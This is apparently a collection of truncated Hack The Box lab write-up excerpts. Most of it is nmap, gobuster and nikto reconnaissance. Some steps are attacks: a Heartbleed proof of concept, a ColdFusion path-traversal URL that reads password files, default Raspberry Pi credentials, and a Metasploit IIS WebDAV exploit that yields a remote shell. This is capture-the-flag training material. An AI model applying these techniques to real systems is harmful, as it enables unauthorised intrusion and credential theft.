HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79
$ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k
$ nikto -h 10.10.10.79
$ sudo nmap --script vuln -p 80 10.10.10.79
$ sudo nmap --script vuln -p 443 10.10.10.79
Based on these results, this box is vulnerable to Heartbleed. https://github.com/sensepost/heartbleed-poc
$ python heartbleed-poc.py 10.10.10.79
$ strings dump.bin
Using https://www.base64decode.org/, aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== decodes to heartbleedbelievethehype.
Access to https://10.10.10.79/dev
https://10.10.10.79/dev/notes.txt
https://10.10.10.79/dev/hype_key
This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb
We just have Apache on port 80 and OpenSSH on port 2222.
Access to http://shocker.htb
ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e
We have a cgi-bin folder that may contain script files. Let’s use Gobuster again, this time searching for files by extension (.sh, .py).
$ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh
Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb
If we access http://mirai.htb, there is another HTTP port. Access to http://mirai.htb:32400, which finally redirects to http://mirai.htb:32400/web/index.html
As described by the Nmap results, we have a Plex Media Server.
ruben@kali:~/htb/mirai$ gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e --wildcard
Access to http://mirai.htb/admin/
So, do we have a Raspberry Pi, maybe running Raspbian? The default Raspbian credentials are pi:raspberry. As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p- 10.10.10.29
There is an Apache 2.4.7 on port 80 and a DNS server on port 53. If you access http://10.10.10.29 there is an Apache2 default site.
As there is an active DNS server, it may be worth adding the hostname to /etc/hosts. All HTB machines follow the same pattern: Box_name.htb
After this step, if we access http://bank.htb we obtain a more promising site.
ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$ nmap -p- -T4 -A 10.10.10.7
Results:
$ gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k
Access to https://10.10.10.7/
So, this box contains an Elastix instance. According to the Wikipedia description: Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Arctic

$ sudo nmap -A -T4 -p- 10.10.10.11
8500/tcp open fmtp?
This is an odd open port. Let’s check it. Access to http://10.10.10.11:8500/
These files are part of a ColdFusion 8 installation. http://10.10.10.11:8500/CFIDE/administrator/
$ searchsploit ColdFusion
$ searchsploit -x 14641
Access to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
What is RDS? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP access to files and databases. You can use RDS to manage

GIT Workflow

HTB Blocky

$ nmap -T4 -p- -sV -A 10.10.10.37
Open ports:
21/tcp    open  ftp        ProFTPD 1.3.5a
22/tcp    open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http       Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open  minecraft  Minecraft 1.11.2
http-generator: WordPress 4.8
$ gobuster dir -u 10.10.10.37 -w /usr/share/wordlists/dirb/common.txt -e
phpMyAdmin login site:
WordPress admin login site:
Uploads folder

HTB Granny

$ nmap -T4 -A -sV -p- 10.10.10.15
$ nmap -p 80 --script vuln 10.10.10.15
$ gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e
$ nikto -h 10.10.10.15
Based on Grandpa’s vulnerability…
msf5 > search CVE-2017-7269
msf5 > use 0
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > getuid
meterpreter > shell
c:\windows\system32\inetsrv>whoami
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getpid
meterpreter > ps

HTB Grandpa

$ nmap -T4 -sV -A -p- 10.10.10.14
Open ports:
80/tcp open http Microsoft IIS httpd 6.0
This seems to be an old version of IIS. According to https://es.wikipedia.org/wiki/Internet_Information_Services, we are working with Windows Vista (Business and Ultimate only) or Windows Server 2008.
$ gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e
$ nikto -h 10.10.10.14
It seems that IIS 6.0 is vulnerable to a zero-day buffer overflow vulnerability (CVE-2017-7269). Let’s follow this path. More information